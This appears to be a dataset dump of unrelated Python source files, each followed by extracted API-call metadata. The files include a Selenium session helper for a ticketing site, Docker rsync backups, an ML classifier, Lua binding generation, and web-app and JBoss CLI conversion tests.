1)\n', (1605, 1624), True, 'import tensorflow as tf\n'), ((2900, 2952), 'tensorflow.math.reduce_logsumexp', 'tf.math.reduce_logsumexp', (['log_norm', '(1)'], {'keepdims': '(True)'}), '(log_norm, 1, keepdims=True)\n', (2924, 2952), True, 'import tensorflow as tf\n'), ((5971, 5985), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (5983, 5985), True, 'import matplotlib.pyplot as plt\n'), ((7221, 7231), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7229, 7231), True, 'import matplotlib.pyplot as plt\n'), ((7621, 7638), 're.split', 're.split', (['""" +"""', 's'], {}), "(' +', s)\n", (7629, 7638), False, 'import re\n'), ((6189, 6201), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (6198, 6201), True, 'import numpy as np\n'), ((6227, 6239), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (6236, 6239), True, 'import numpy as np\n'), ((6600, 6612), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (6609, 6612), True, 'import numpy as np\n'), ((6640, 6652), 'numpy.arange', 'np.arange', (['(4)'], {}), '(4)\n', (6649, 6652), True, 'import numpy as np\n'), ((9086, 9097), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (9094, 9097), True, 'import numpy as np\n'), ((9099, 9134), 'tensorflow.keras.utils.to_categorical', 'tf.keras.utils.to_categorical', (['Y', '(5)'], {}), '(Y, 5)\n', (9128, 9134), True, 'import tensorflow as tf\n')] |
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.by import By
from selenium import webdriver
import requests
def login():
driver = webdriver.Chrome()
driver.implicitly_wait(20)
driver.get("https://tixcraft.com/login")
WebDriverWait(driver, 600).until(
EC.visibility_of_element_located((By.XPATH, "//*[@class='user-name']"))
)
cookies = driver.get_cookies()
driver.quit()
return cookies
def user_verify(driver, url):
driver.get(url)
url = driver.current_url
while "ticket/verify" in url:
try:
url = driver.current_url
WebDriverWait(driver, 2).until(EC.alert_is_present())
alert = driver.switch_to_alert()
alert.accept()
except:
pass
return url
def session_to_driver(session):
cookies = session.cookies.get_dict()
driver = webdriver.Chrome()
driver.get("https://tixcraft.com")
for name, value in cookies.items():
cookie = {"name": name, "value": value}
driver.add_cookie(cookie)
return driver
def driver_to_session(driver):
cookies = driver.get_cookies()
session = requests.Session()
for cookie in cookies:
session.cookies.set(cookie["name"], cookie["value"])
return session
| [
"requests.Session",
"selenium.webdriver.Chrome",
"selenium.webdriver.support.wait.WebDriverWait",
"selenium.webdriver.support.expected_conditions.alert_is_present",
"selenium.webdriver.support.expected_conditions.visibility_of_element_located"
] | [((242, 260), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (258, 260), False, 'from selenium import webdriver\n'), ((972, 990), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (988, 990), False, 'from selenium import webdriver\n'), ((1252, 1270), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1268, 1270), False, 'import requests\n'), ((383, 454), 'selenium.webdriver.support.expected_conditions.visibility_of_element_located', 'EC.visibility_of_element_located', (['(By.XPATH, "//*[@class=\'user-name\']")'], {}), '((By.XPATH, "//*[@class=\'user-name\']"))\n', (415, 454), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((341, 367), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['driver', '(600)'], {}), '(driver, 600)\n', (354, 367), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((741, 762), 'selenium.webdriver.support.expected_conditions.alert_is_present', 'EC.alert_is_present', ([], {}), '()\n', (760, 762), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((710, 734), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['driver', '(2)'], {}), '(driver, 2)\n', (723, 734), False, 'from selenium.webdriver.support.wait import WebDriverWait\n')] |
from rest_framework.views import APIView
from rest_framework.response import Response
from auth_API.helpers import get_or_create_user_information
class CheckConnection(APIView):
def post(self, request, format=None):
# --> 1. Get connection status and id
user_info = get_or_create_user_information(request.session, request.user, 'EOSS')
conn_status = user_info.mycroft_connection
conn_id = user_info.mycroft_session
print('--> CHECKING MYCROFT CONNECTIONS:', conn_id, conn_status)
if conn_status is False:
return Response({"connection": "false", "access_token": conn_id})
else:
return Response({"connection": "true"})
| [
"auth_API.helpers.get_or_create_user_information",
"rest_framework.response.Response"
] | [((291, 360), 'auth_API.helpers.get_or_create_user_information', 'get_or_create_user_information', (['request.session', 'request.user', '"""EOSS"""'], {}), "(request.session, request.user, 'EOSS')\n", (321, 360), False, 'from auth_API.helpers import get_or_create_user_information\n'), ((582, 640), 'rest_framework.response.Response', 'Response', (["{'connection': 'false', 'access_token': conn_id}"], {}), "({'connection': 'false', 'access_token': conn_id})\n", (590, 640), False, 'from rest_framework.response import Response\n'), ((674, 706), 'rest_framework.response.Response', 'Response', (["{'connection': 'true'}"], {}), "({'connection': 'true'})\n", (682, 706), False, 'from rest_framework.response import Response\n')] |
from models.statistical.ml_classifier import MLClassifier
from models.statistical.models import ModelsFactory
from models.statistical.tokenizer import TokenizerFactory
# can be loaded from a config file
model_name = 'xgb'
tokenizer_name = 'default'
ngrams = 2
name = 'sst2'
stopwords = False
max_features = 5000
test_size = 0.2
model = ModelsFactory.from_name(model_name) # init model
tokenizer = TokenizerFactory.from_name(tokenizer_name) # init tokenizer
def predict_ml_classifier(text, plot=False):
"""
Predict label from input text
:param text: input text
:param plot: show important words
:return: predicted value
"""
ml_classifier = MLClassifier(input_data=None,
output_data=None,
model=model,
tokenizer=tokenizer,
stop_words=stopwords,
ngram=ngrams,
max_features=max_features,
test_size=test_size,
name=name)
return ml_classifier.predict([text], plot=plot)[0]
def train_ml_classifier(input_data, output_data):
"""
Train a classifier
:param input_data: input documents
:param output_data: labels
:return:
"""
ml_classifier = MLClassifier(input_data=input_data,
output_data=output_data,
model=model,
tokenizer=tokenizer,
stop_words=stopwords,
ngram=ngrams,
max_features=max_features,
test_size=test_size,
name=name)
ml_classifier.train(resampling=False)
if __name__ == '__main__':
import pandas as pd
from configs import SST2_DIR
df = pd.read_csv(SST2_DIR + '/train.tsv', delimiter='\t')
input_data = df['sentence']
output_data = df['label']
print('Training ML classifier')
train_ml_classifier(input_data, output_data) | [
"models.statistical.ml_classifier.MLClassifier",
"models.statistical.models.ModelsFactory.from_name",
"models.statistical.tokenizer.TokenizerFactory.from_name",
"pandas.read_csv"
] | [((340, 375), 'models.statistical.models.ModelsFactory.from_name', 'ModelsFactory.from_name', (['model_name'], {}), '(model_name)\n', (363, 375), False, 'from models.statistical.models import ModelsFactory\n'), ((402, 444), 'models.statistical.tokenizer.TokenizerFactory.from_name', 'TokenizerFactory.from_name', (['tokenizer_name'], {}), '(tokenizer_name)\n', (428, 444), False, 'from models.statistical.tokenizer import TokenizerFactory\n'), ((675, 861), 'models.statistical.ml_classifier.MLClassifier', 'MLClassifier', ([], {'input_data': 'None', 'output_data': 'None', 'model': 'model', 'tokenizer': 'tokenizer', 'stop_words': 'stopwords', 'ngram': 'ngrams', 'max_features': 'max_features', 'test_size': 'test_size', 'name': 'name'}), '(input_data=None, output_data=None, model=model, tokenizer=\n tokenizer, stop_words=stopwords, ngram=ngrams, max_features=\n max_features, test_size=test_size, name=name)\n', (687, 861), False, 'from models.statistical.ml_classifier import MLClassifier\n'), ((1439, 1637), 'models.statistical.ml_classifier.MLClassifier', 'MLClassifier', ([], {'input_data': 'input_data', 'output_data': 'output_data', 'model': 'model', 'tokenizer': 'tokenizer', 'stop_words': 'stopwords', 'ngram': 'ngrams', 'max_features': 'max_features', 'test_size': 'test_size', 'name': 'name'}), '(input_data=input_data, output_data=output_data, model=model,\n tokenizer=tokenizer, stop_words=stopwords, ngram=ngrams, max_features=\n max_features, test_size=test_size, name=name)\n', (1451, 1637), False, 'from models.statistical.ml_classifier import MLClassifier\n'), ((2095, 2147), 'pandas.read_csv', 'pd.read_csv', (["(SST2_DIR + '/train.tsv')"], {'delimiter': '"""\t"""'}), "(SST2_DIR + '/train.tsv', delimiter='\\t')\n", (2106, 2147), True, 'import pandas as pd\n')] |
from app.main import create_app
from waitress import serve
if __name__ == "__main__":
app = create_app()
serve(app, host='0.0.0.0', port='5000')
| [
"waitress.serve",
"app.main.create_app"
] | [((98, 110), 'app.main.create_app', 'create_app', ([], {}), '()\n', (108, 110), False, 'from app.main import create_app\n'), ((115, 154), 'waitress.serve', 'serve', (['app'], {'host': '"""0.0.0.0"""', 'port': '"""5000"""'}), "(app, host='0.0.0.0', port='5000')\n", (120, 154), False, 'from waitress import serve\n')] |
import martian
from martian.error import GrokError
from grokcore.component import name as namedirective
from zope import component
from bst.pygasus.datamanager.model import ExtBaseModel
from bst.pygasus.datamanager.interfaces import IModelTransformer
from bst.pygasus.datamanager.transformer import ModelTransfomerUtility
class schema(martian.Directive):
scope = martian.CLASS
store = martian.ONCE
default = None
class ExtModelGrokker(martian.ClassGrokker):
martian.component(ExtBaseModel)
martian.directive(schema)
martian.directive(namedirective)
def execute(self, class_, schema, name, **kw):
if schema is None:
raise GrokError('Class %s is missing directive "schema". Need a Interface\
to create the model.' % class_, class_)
if not name:
name = class_.__name__
gsm = component.getGlobalSiteManager()
transformer = ModelTransfomerUtility(class_, schema)
gsm.registerUtility(transformer, IModelTransformer, name)
return True
| [
"martian.component",
"zope.component.getGlobalSiteManager",
"bst.pygasus.datamanager.transformer.ModelTransfomerUtility",
"martian.directive",
"martian.error.GrokError"
] | [((479, 510), 'martian.component', 'martian.component', (['ExtBaseModel'], {}), '(ExtBaseModel)\n', (496, 510), False, 'import martian\n'), ((515, 540), 'martian.directive', 'martian.directive', (['schema'], {}), '(schema)\n', (532, 540), False, 'import martian\n'), ((545, 577), 'martian.directive', 'martian.directive', (['namedirective'], {}), '(namedirective)\n', (562, 577), False, 'import martian\n'), ((885, 917), 'zope.component.getGlobalSiteManager', 'component.getGlobalSiteManager', ([], {}), '()\n', (915, 917), False, 'from zope import component\n'), ((940, 978), 'bst.pygasus.datamanager.transformer.ModelTransfomerUtility', 'ModelTransfomerUtility', (['class_', 'schema'], {}), '(class_, schema)\n', (962, 978), False, 'from bst.pygasus.datamanager.transformer import ModelTransfomerUtility\n'), ((675, 820), 'martian.error.GrokError', 'GrokError', (['(\'Class %s is missing directive "schema". Need a Interface to create the model.\'\n % class_)', 'class_'], {}), '(\n \'Class %s is missing directive "schema". Need a Interface to create the model.\'\n % class_, class_)\n', (684, 820), False, 'from martian.error import GrokError\n')] |
#!/usr/bin/env python3
import logging
from os import getuid, getgid
from os.path import join
import docker
from .logger import log_from_docker
class DockerRsync(object):
def __init__(self, client=docker.from_env()):
self.client = client
def _run_rsync(self, volumes, from_path, to_path, relative):
# Disable ssh compression:
# https://galaxysd.github.io/20160302/Fastest-Way-Rsync
ssh_cmd = "ssh -o Compression=no"
cmd = ["rsync",
# copy directories recursively
"-r",
# verbose - give info about what files are being transferred
# and a brief summary at the end
"-v",
# specify remote shell program explicitly (i.e. ssh as opposed
# to the default rsh)
"-e", ssh_cmd,
# preserve file permissions
"--perms",
# delete destination files not in source
"--delete",
# print overall progress
"--info=progress2",
# preserve timestamps
"--times",
from_path,
to_path
]
if relative:
cmd.append("--relative")
logging.debug("Running rsync in docker with: " + " ".join(cmd))
logging.debug("Volume mapping: " + str(volumes))
container = self.client.containers.run("instrumentisto/rsync-ssh",
command=cmd, volumes=volumes,
detach=True)
try:
log_from_docker(container)
container.reload()
code = container.attrs["State"]["ExitCode"]
if code != 0:
raise RsyncError(code, container)
except KeyboardInterrupt as e:
logging.warning("Stopping container " + container.name)
container.stop()
raise e
finally:
container.remove()
def _run_rsync_with_restart(self, volumes, from_path, to_path, relative,
restarts=5):
attempts = 1
done = False
while not done:
try:
self._run_rsync(volumes, from_path, to_path, relative=relative)
done = True
except RsyncError as e:
print(str(e), flush=True)
attempts += 1
if attempts > restarts:
raise Exception("rsync failed too many times")
print("trying again... {}/{}".format(attempts, restarts),
flush=True)
def _get_volume_args(self, local_volume, volume_mode):
mounted_volume = join("/", local_volume)
return {
"bb8_ssh": {"bind": "/root/.ssh", "mode": "ro"},
local_volume: {"bind": mounted_volume, "mode": volume_mode}
}
# local_volume can be an absolute path or a named volume
def backup_volume(self, local_volume, remote_path):
volumes = self._get_volume_args(local_volume, "ro")
logging.info("Backing up to {} from {}".format(remote_path,
local_volume))
self._run_rsync_with_restart(volumes, local_volume, remote_path,
relative=True)
def restore_volume(self, local_volume, remote_path):
mounted_volume = join("/", local_volume)
volumes = self._get_volume_args(local_volume, "rw")
remote_path = "{}{}/".format(remote_path, local_volume)
logging.info("Restoring from {} to {}".format(remote_path,
local_volume))
self._run_rsync_with_restart(volumes, remote_path, mounted_volume,
relative=False)
class RsyncError(Exception):
def __init__(self, code, container):
super().__init__("Rsync failed with code {}".format(code))
self.code = code
self.container = container
| [
"logging.warning",
"docker.from_env",
"os.path.join"
] | [((204, 221), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (219, 221), False, 'import docker\n'), ((2741, 2764), 'os.path.join', 'join', (['"""/"""', 'local_volume'], {}), "('/', local_volume)\n", (2745, 2764), False, 'from os.path import join\n'), ((3450, 3473), 'os.path.join', 'join', (['"""/"""', 'local_volume'], {}), "('/', local_volume)\n", (3454, 3473), False, 'from os.path import join\n'), ((1866, 1921), 'logging.warning', 'logging.warning', (["('Stopping container ' + container.name)"], {}), "('Stopping container ' + container.name)\n", (1881, 1921), False, 'import logging\n')] |
#!/usr/bin/env python
import collections
import re
def write_constants(out, lua_version):
out.write("EMSCRIPTEN_KEEPALIVE\n")
out.write("emlua_constant emlua_constants[] = {\n")
with open("lists/lua5{}/constants".format(lua_version)) as constants_file:
for line in constants_file:
constant_name = line.rstrip()
out.write('{{"{}", {}}},\n'.format(constant_name, constant_name))
out.write("};\n")
c_js_types = {
"void": "null",
"int": "number",
"char": "number",
"long": "number",
"size_t": "number",
"char *": "string",
"lua_State *": "state",
"lua_Alloc": "number",
"lua_CFunction": "number",
"lua_KFunction": "number",
"lua_Reader": "number",
"lua_Writer": "number",
"lua_Hook": "number",
"lua_Integer": "number",
"lua_Number": "number",
"lua_Unsigned": "number",
"lua_KContext": "number"
}
def get_js_type(c_type):
if c_type.startswith("const "):
c_type = c_type[len("const "):]
if c_type in c_js_types:
return c_js_types[c_type]
if c_type.endswith("*"):
return "number"
class Function(object):
def __init__(self, function_line):
line_match = re.match(r"^(.*\W)(\w+)\s*\((.*)\);$", function_line)
self._ret_type = line_match.group(1).strip()
js_ret_type = get_js_type(self._ret_type)
self._name = line_match.group(2)
self._full_args = line_match.group(3)
self._js_types = [js_ret_type]
self._arg_names = []
for typed_arg in self._full_args.split(", "):
if typed_arg == "void":
break
elif typed_arg == "..." or typed_arg.endswith("[]"):
self.supported = False
return
arg_match = re.match(r"^(.*\W)(\w+)$", typed_arg)
js_arg_type = get_js_type(arg_match.group(1).strip())
self._js_types.append(js_arg_type)
self._arg_names.append(arg_match.group(2))
self.supported = True
def append_to_function_list(self, out):
out.write('{{"{}", "{}"}},\n'.format(self._name, " ".join(self._js_types)))
def write_emlua_function(self, out):
out.write("EMSCRIPTEN_KEEPALIVE\n")
out.write("{} em{}({}) {{\n".format(self._ret_type, self._name, self._full_args))
if self._ret_type == "void":
out.write(" {}({});\n".format(self._name, ", ".join(self._arg_names)))
else:
out.write(" return {}({});\n".format(self._name, ", ".join(self._arg_names)))
out.write("}\n")
def write_functions(out, lua_version):
out.write("emlua_function emlua_functions[] = {\n")
functions = []
with open("lists/lua5{}/functions".format(lua_version)) as functions_file:
for line in functions_file:
function = Function(line.rstrip())
if function.supported:
functions.append(function)
function.append_to_function_list(out)
out.write("};\n")
for function in functions:
function.write_emlua_function(out)
def write_bindings(out, lua_version):
out.write("#if LUA_VERSION_NUM == 50{}\n".format(lua_version))
write_constants(out, lua_version)
write_functions(out, lua_version)
out.write("#endif\n")
def main():
with open("emlua_bindings.c", "w") as out:
out.write("/* Generated by ./gen_bindings.py. */\n")
out.write("#include <emscripten.h>\n")
out.write('#include "lua.h"\n')
out.write('#include "lualib.h"\n')
out.write('#include "lauxlib.h"\n')
for lua_version in ["1", "2", "3"]:
write_bindings(out, lua_version)
if __name__ == "__main__":
main()
| [
"re.match"
] | [((1221, 1278), 're.match', 're.match', (['"""^(.*\\\\W)(\\\\w+)\\\\s*\\\\((.*)\\\\);$"""', 'function_line'], {}), "('^(.*\\\\W)(\\\\w+)\\\\s*\\\\((.*)\\\\);$', function_line)\n", (1229, 1278), False, 'import re\n'), ((1799, 1837), 're.match', 're.match', (['"""^(.*\\\\W)(\\\\w+)$"""', 'typed_arg'], {}), "('^(.*\\\\W)(\\\\w+)$', typed_arg)\n", (1807, 1837), False, 'import re\n')] |
import pytest
from django.urls import reverse
from tests.users import factories as users_factories
@pytest.mark.django_db
class TestTicketCreateView:
def test_get(self,client):
url = reverse('support:support-contact')
response = client.get(url)
assert response.status_code == 200
def test_post(self,client):
url = reverse('support:support-contact')
response = client.post(url)
assert response.status_code == 200
user = users_factories.StudentFactory()
data = {
"email": user.email,
"category": '1',
"fullname": f'{user.first_name} {user.last_name}',
"description": "problem"
}
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '2'
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '3'
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '0'
response = client.post(url, data=data)
assert response.status_code == 200
| [
"tests.users.factories.StudentFactory",
"django.urls.reverse"
] | [((198, 232), 'django.urls.reverse', 'reverse', (['"""support:support-contact"""'], {}), "('support:support-contact')\n", (205, 232), False, 'from django.urls import reverse\n'), ((358, 392), 'django.urls.reverse', 'reverse', (['"""support:support-contact"""'], {}), "('support:support-contact')\n", (365, 392), False, 'from django.urls import reverse\n'), ((488, 520), 'tests.users.factories.StudentFactory', 'users_factories.StudentFactory', ([], {}), '()\n', (518, 520), True, 'from tests.users import factories as users_factories\n')] |
"""Tests for handling the users resource"""
import unittest
import json
from app import create_app
from app.API.utilities.database import connection
class UserTestCase(unittest.TestCase):
"""Unit testiing for the user regsitration endpoint"""
def setUp(self):
"""Initialize the app and database connections"""
self.app = create_app(config_name="testing")
self.client = self.app.test_client
self.user = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "<EMAIL>",
"password" : "<PASSWORD>",
"confirm" : "jos@Aeph12",
}
self.user2 = {
"firstname" : "simon",
"lastname" : "jose",
"email" : "<EMAIL>",
"password" : "<PASSWORD>",
}
self.user3 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "<EMAIL>",
"password" : "<PASSWORD>",
"confirm" : "<PASSWORD>",
}
self.user4 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "<EMAIL>",
"password" : "<PASSWORD>",
"confirm" : "jo<PASSWORD>",
}
self.user5 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "<EMAIL>",
"password" : "<PASSWORD>",
"confirm" : "jos<PASSWORD>",
}
with self.app.app_context():
connection.initializedb()
def create_user(self):
response = self.client().post('/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json')
def tearDown(self):
"""Drops all tables after tests are done"""
with self.app.app_context():
connection.dbconnection()
connection.drop_tables()
def test_user_register(self):
"""Test to successfuly register a new user reg"""
response = self.client().post('/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json')
#self.assertEqual(response.status_code, 201)
#self.assertIn('User Successfully Created', str(response.data))
def test_user_login(self):
"""Successfully log into the app"""
self.create_user()
response = self.client().post('/api/v2/users/auth/login',
data=json.dumps(self.user),
content_type='application/json')
#self.assertEqual(response.status_code, 200)
#self.assertIn('User Successfully logged in', str(response.data))
def test_login_wrong_passwords(self):
"""Tests for checking if password match"""
response = self.client().post(
'/api/v2/users/auth/login',
data=json.dumps(self.user2),
content_type='application/json')
#self.assertEqual(response.status_code, 401)
#self.assertIn("Error logging in, credentials not found", str(response.data))
def test_add_user_who_exists(self):
"""Tests for adding a new user who exists"""
self.create_user()
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
#self.assertEqual(response.status_code, 409)
#self.assertIn("There is a user with the same email registere", str(response.data))
def test_add_user_with_poor_email(self):
"""Tests for adding a new user with poor email"""
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user4),
content_type='application/json'
)
#self.assertEqual(response.status_code, 401)
#self.assertIn("Invalid email provided", str(response.data))
def test_add_user_with_diff_pass(self):
"""Tests for adding a new user with diff password"""
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user5),
content_type='application/json'
)
#self.assertEqual(response.status_code, 401)
#self.assertIn("Passwords do not match", str(response.data))
| [
"json.dumps",
"app.create_app",
"app.API.utilities.database.connection.initializedb",
"app.API.utilities.database.connection.dbconnection",
"app.API.utilities.database.connection.drop_tables"
] | [((347, 380), 'app.create_app', 'create_app', ([], {'config_name': '"""testing"""'}), "(config_name='testing')\n", (357, 380), False, 'from app import create_app\n'), ((1525, 1550), 'app.API.utilities.database.connection.initializedb', 'connection.initializedb', ([], {}), '()\n', (1548, 1550), False, 'from app.API.utilities.database import connection\n'), ((1923, 1948), 'app.API.utilities.database.connection.dbconnection', 'connection.dbconnection', ([], {}), '()\n', (1946, 1948), False, 'from app.API.utilities.database import connection\n'), ((1961, 1985), 'app.API.utilities.database.connection.drop_tables', 'connection.drop_tables', ([], {}), '()\n', (1983, 1985), False, 'from app.API.utilities.database import connection\n'), ((1703, 1724), 'json.dumps', 'json.dumps', (['self.user'], {}), '(self.user)\n', (1713, 1724), False, 'import json\n'), ((2191, 2212), 'json.dumps', 'json.dumps', (['self.user'], {}), '(self.user)\n', (2201, 2212), False, 'import json\n'), ((2623, 2644), 'json.dumps', 'json.dumps', (['self.user'], {}), '(self.user)\n', (2633, 2644), False, 'import json\n'), ((3035, 3057), 'json.dumps', 'json.dumps', (['self.user2'], {}), '(self.user2)\n', (3045, 3057), False, 'import json\n'), ((3465, 3486), 'json.dumps', 'json.dumps', (['self.user'], {}), '(self.user)\n', (3475, 3486), False, 'import json\n'), ((3896, 3918), 'json.dumps', 'json.dumps', (['self.user4'], {}), '(self.user4)\n', (3906, 3918), False, 'import json\n'), ((4307, 4329), 'json.dumps', 'json.dumps', (['self.user5'], {}), '(self.user5)\n', (4317, 4329), False, 'import json\n')] |
import numpy as np
import torch
import torch.nn as nn
from collections import OrderedDict
def tf2th(conv_weights):
"""Possibly convert HWIO to OIHW."""
if conv_weights.ndim == 4:
conv_weights = conv_weights.transpose([3, 2, 0, 1])
return torch.from_numpy(conv_weights)
def _rename_conv_weights_for_deformable_conv_layers(state_dict, cfg):
import re
layer_keys = sorted(state_dict.keys())
for ix, stage_with_dcn in enumerate(cfg.MODEL.RESNETS.STAGE_WITH_DCN, 1):
if not stage_with_dcn:
continue
for old_key in layer_keys:
pattern = ".*block{}.*conv2.*".format(ix)
r = re.match(pattern, old_key)
if r is None:
continue
for param in ["weight", "bias"]:
if old_key.find(param) is -1:
continue
if 'unit01' in old_key:
continue
new_key = old_key.replace(
"conv2.{}".format(param), "conv2.conv.{}".format(param)
)
print("pattern: {}, old_key: {}, new_key: {}".format(
pattern, old_key, new_key
))
# Calculate SD conv weight
w = state_dict[old_key]
v, m = torch.var_mean(w, dim=[1, 2, 3], keepdim=True, unbiased=False)
w = (w - m) / torch.sqrt(v + 1e-10)
state_dict[new_key] = w
del state_dict[old_key]
return state_dict
def load_big_format(cfg, f):
model = OrderedDict()
weights = np.load(f)
cmap = {'a':1, 'b':2, 'c':3}
for key, val in weights.items():
old_key = key.replace('resnet/', '')
if 'root_block' in old_key:
new_key = 'root.conv.weight'
elif '/proj/standardized_conv2d/kernel' in old_key:
key_pattern = old_key.replace('/proj/standardized_conv2d/kernel', '').replace('resnet/', '')
bname, uname, cidx = key_pattern.split('/')
new_key = '{}.downsample.{}.conv{}.weight'.format(bname,uname,cmap[cidx])
elif '/standardized_conv2d/kernel' in old_key:
key_pattern = old_key.replace('/standardized_conv2d/kernel', '').replace('resnet/', '')
bname, uname, cidx = key_pattern.split('/')
new_key = '{}.{}.conv{}.weight'.format(bname,uname,cmap[cidx])
elif '/group_norm/gamma' in old_key:
key_pattern = old_key.replace('/group_norm/gamma', '').replace('resnet/', '')
bname, uname, cidx = key_pattern.split('/')
new_key = '{}.{}.gn{}.weight'.format(bname,uname,cmap[cidx])
elif '/group_norm/beta' in old_key:
key_pattern = old_key.replace('/group_norm/beta', '').replace('resnet/', '')
bname, uname, cidx = key_pattern.split('/')
new_key = '{}.{}.gn{}.bias'.format(bname,uname,cmap[cidx])
else:
print('Unknown key {}'.format(old_key))
continue
print('Map {} -> {}'.format(key, new_key))
model[new_key] = tf2th(val)
model = _rename_conv_weights_for_deformable_conv_layers(model, cfg)
return dict(model=model)
| [
"collections.OrderedDict",
"re.match",
"torch.sqrt",
"torch.from_numpy",
"torch.var_mean",
"numpy.load"
] | [((272, 302), 'torch.from_numpy', 'torch.from_numpy', (['conv_weights'], {}), '(conv_weights)\n', (288, 302), False, 'import torch\n'), ((1609, 1622), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1620, 1622), False, 'from collections import OrderedDict\n'), ((1638, 1648), 'numpy.load', 'np.load', (['f'], {}), '(f)\n', (1645, 1648), True, 'import numpy as np\n'), ((678, 704), 're.match', 're.match', (['pattern', 'old_key'], {}), '(pattern, old_key)\n', (686, 704), False, 'import re\n'), ((1339, 1401), 'torch.var_mean', 'torch.var_mean', (['w'], {'dim': '[1, 2, 3]', 'keepdim': '(True)', 'unbiased': '(False)'}), '(w, dim=[1, 2, 3], keepdim=True, unbiased=False)\n', (1353, 1401), False, 'import torch\n'), ((1433, 1454), 'torch.sqrt', 'torch.sqrt', (['(v + 1e-10)'], {}), '(v + 1e-10)\n', (1443, 1454), False, 'import torch\n')] |
import unittest
from convert import jboss_command_to_http_request
class TestJBOSSCommandToHTTPGETRequestOperationOnlyTestCase(unittest.TestCase):
"""Test case for JBOSS CLI commands operation only commands using HTTP GET"""
def test_no_path_one_operations_no_params_http_get(self):
"""See if we only operations without params return correctly using HTTP GET"""
test_data = ':read-resource'
desired_operation = {"operation": "resource"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_empty_params_http_get(self):
"""See if only operations with empty params return correctly using HTTP GET"""
test_data = ':read-resource()'
desired_operation = {"operation": "resource"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_single_param_http_get(self):
""" See if only operations with single parameter return correctly using HTTP GET"""
test_data = ':read-resource(attributes-only=true)'
desired_operation = {"operation": "resource", "attributes-only": "true"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_multiple_params_http_get(self):
"""See if only operations with multiple params return correctly using HTTP GET"""
test_data = ':read-attribute(include-defaults=true,name=uuid)'
desired_operation = {"operation": "attribute", "include-defaults": "true", "name": "uuid"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
class TestJBOSSCommandToHTTPPOSTRequestOperationOnlyTestCase(unittest.TestCase):
"""Test case for JBOSS CLI commands operation only commands using HTTP POST"""
def test_no_path_one_operations_no_params_http_post(self):
"""See if we only operations without params return correctly using HTTP POST"""
test_data = ':read-resource'
desired_operation = {"operation": "read-resource"}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_empty_params_http_post(self):
"""See if only operations with empty params return correctly using HTTP POST"""
test_data = ':read-resource()'
desired_operation = {"operation": "read-resource"}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_single_param_http_post(self):
"""See if only operations with single parameter return correctly using HTTP POST"""
test_data = ':read-attribute(name=server-state)'
desired_operation = {"operation": "read-attribute", "name": "server-state"}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
def test_no_path_only_operations_multiple_params_http_post(self):
"""See if only operations with multiple params return correctly using HTTP POST"""
test_data = ':read-operation-description(name=whoami,access-control=true)'
desired_operation = {"operation": "read-operation-description", "name": "whoami", "access-control": "true"}
result = jboss_command_to_http_request(test_data, "POST")
self.assertEqual(result, desired_operation)
class TTestJBOSSCommandToHTTPGETRequestTestCase(unittest.TestCase):
"""Test case for for convert.jboss_command_to_http_request"""
def test_single_path_and_operation_no_params_http_get(self):
"""See if command with path and operation returns correctly using HTTP GET"""
test_data = '/subsystem=undertow:read-resource'
desired_operation = {"operation": "resource", "address": "/subsystem/undertow"}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_single_path_and_operation_single_param_http_get(self):
"""See if command with path, operation, and single param return correctly using HTTP GET"""
test_data = '/subsystem=undertow:read-attribute(resolve-expressions=true)'
desired_operation = {
"operation": "attribute", "resolve-expressions": "true", "address": "/subsystem/undertow"
}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_single_path_and_operation_multiple_params_http_get(self):
"""See if command with path, operation, and multiple params return correctlty using HTTP GET"""
test_data = '/subsystem=undertow:read-attribute(resolve-expressions=true,name=instance-id)'
desired_operation = {
"operation": "attribute", "resolve-expressions": "true", "name": "instance-id",
"address": "/subsystem/undertow"
}
result = jboss_command_to_http_request(test_data, "GET")
self.assertEqual(result, desired_operation)
def test_multiple_path_and_operation_no_params_http_get(self):
"""See if command with path, operation, and single param return correctly using HTTP GET"""
test_data = '/subsystem=undertow/server=default-server:read-resource'
